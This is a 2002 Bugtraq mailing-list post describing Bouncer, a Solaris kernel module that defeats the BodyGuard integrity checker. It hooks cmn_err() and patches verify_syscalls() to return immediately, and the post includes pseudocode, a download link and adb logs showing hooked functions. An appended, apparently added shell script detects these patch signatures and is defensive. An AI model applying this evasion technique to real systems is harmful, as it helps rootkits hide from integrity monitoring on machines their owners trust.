Bugtraq mailing list archives

Re: UnBodyGuard a.k.a Bouncer (Solaris kernel function hijacking) (fwd)


From: noir sin <noir () olympos org>
Date: Sun, 7 Jul 2002 05:10:07 -0700 (PDT)


apologies for replying to my own mail but i must say; i have successfully
developed what i was talking about below... also fixed an alignment issue
that leads to a crash in some rare cases.

you can download the new package from:

http://gsu.linux.org.tr/~noir/b.tar.gz


primary_inhouse_kernel_function_used_by_bodyguard()
{
      .....
      if(kobj_getsymvalue(verify_syscalls,1)){
            do page protection manipulation
            patch the proper place with "return TRUE" of the verify_syscalls()
            !! this will make verify_syscalls return TRUE meaning no problems
      }
      ....
      do the realstuff ...
}

this will render any kernel integrity level checker useless. solution
is simple: integrity checkers have to be stealthy too, like their counterparts
(backdoors)

here is how things are:
bouncer hooks cmn_err()* and checks if verify_syscalls() resolves, if YES
it patches the first 2 instructions of verify_syscalls with "retl; nop;"

* cmn_err() is used for reporting to userland (through /var/adm/messages)
so at _init() bodyguard calls cmn_err() to report its
successful installation, nada!  bouncer kicks in and patches
verify_syscall() ...
;0)

now you can even change the sysent/sysent32 table with no worries ; )
logs of BOUNCER in action:

bash-2.03# uname -a
SunOS slint 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10
bash-2.03# isainfo -b
64
bash-2.03# cd BOUNCER/
bash-2.03# modload b2
bash-2.03#
bash-2.03# /usr/local/sbin/sshd
bash: /usr/lib/.funky/sshd: No such file or directory
bash-2.03# cd ../BODYGUARD
bash-2.03# sh runbodyguard_verifier.sh
This is the license for BodyGuard Kernel Verifier, Demo Version 1.0

.....
Jul  7 04:45:50 slint bodyguard: [ID 801043 kern.notice] NOTICE:
Installing Immunity BODYGUARD module!
Jul  7 04:45:50 slint bodyguard: [ID 300378 kern.notice] NOTICE: If there
are any problems, please e-mail Dave Aitel at dave () immunitysec com
Jul  7 04:45:50 slint bodyguard: [ID 779008 kern.notice] NOTICE: This is
just a demo version of the Immunity BODYGUARD product.
Jul  7 04:45:50 slint bodyguard: [ID 530759 kern.notice] NOTICE: For a
year-long site license, or limited source code license, please see
http://www.immunitysec.com.
Jul  7 04:45:50 slint bodyguard: [ID 222896 kern.notice] NOTICE: Done
installing BODYGUARD.
Jul  7 04:45:51 slint bodyguard: [ID 887483 kern.notice] NOTICE: Removing
BODYGUARD module!
Jul  7 05:01:22 slint bodyguard: [ID 801043 kern.notice] NOTICE:
Installing Immunity BODYGUARD module!
Jul  7 05:01:22 slint bodyguard: [ID 300378 kern.notice] NOTICE: If there
are any problems, please e-mail Dave Aitel at dave () immunitysec com
Jul  7 05:01:22 slint bodyguard: [ID 779008 kern.notice] NOTICE: This is
just a demo version of the Immunity BODYGUARD product.

bash-2.03# modload bodyguard
bash-2.03# adb -k /dev/ksyms
physmem 3b5b
verify_syscalls/i
verify_syscalls:
verify_syscalls:                retl

verify_syscalls+4:              nop

cmn_err+0x94/i
cmn_err+0x94:   call    uncle_steve_albini

exece+0xc/i
exece+0xc:      call    hook_execcommon

later,
noir
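Added example, not from noir's post or from either tool: a small POSIX sh check that reads adb -k style disassembly (here a constructed sample modelled on the session above) and flags the two signs shown in it: a verifier whose first two instructions are "retl; nop" (it returns immediately), and "call" targets that are not in an allowlist of known kernel symbols. The allowlist KNOWN is constructed for the example; the target names come from the post's adb output.

```shell
#!/bin/sh
# Added example: detect the patched-verifier and foreign-call signatures
# in adb -k "/i" disassembly output. Input text is constructed, modelled on
# the adb session in the post above.

# Constructed sample of "symbol/i" output lines.
SAMPLE='verify_syscalls:                retl
verify_syscalls+4:              nop
cmn_err+0x94:   call    uncle_steve_albini
exece+0xc:      call    hook_execcommon
kmem_alloc:     save    %sp, -0x60, %sp
kmem_alloc+4:   call    kmem_cache_alloc'

# Constructed allowlist of symbols expected in the kernel's own symbol table.
# In practice this would be built from a known-good /dev/ksyms listing.
KNOWN='kmem_cache_alloc
cmn_err
exece
kmem_alloc
verify_syscalls'

# prologue_is_stub FUNC TEXT
# Returns 0 when FUNC's first two instructions in TEXT are "retl" and "nop",
# i.e. the function has been short-circuited to return immediately.
prologue_is_stub() {
    func=$1
    first=$(printf '%s\n' "$2" | awk -v f="$func:" '$1==f {print $2; exit}')
    second=$(printf '%s\n' "$2" | awk -v f="$func+4:" '$1==f {print $2; exit}')
    [ "$first" = "retl" ] && [ "$second" = "nop" ]
}

# foreign_call_targets TEXT KNOWN
# Prints every "call" target in TEXT that does not appear in the KNOWN list,
# one per line; these are the candidates for injected hook functions.
foreign_call_targets() {
    printf '%s\n' "$1" | awk '$2=="call" {print $3}' | while read -r t; do
        printf '%s\n' "$2" | grep -qx "$t" || printf '%s\n' "$t"
    done
}
```

On a live system the SAMPLE text would be replaced by the output of `echo 'verify_syscalls/i' | adb -k /dev/ksyms` and similar queries for each function you want to check.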
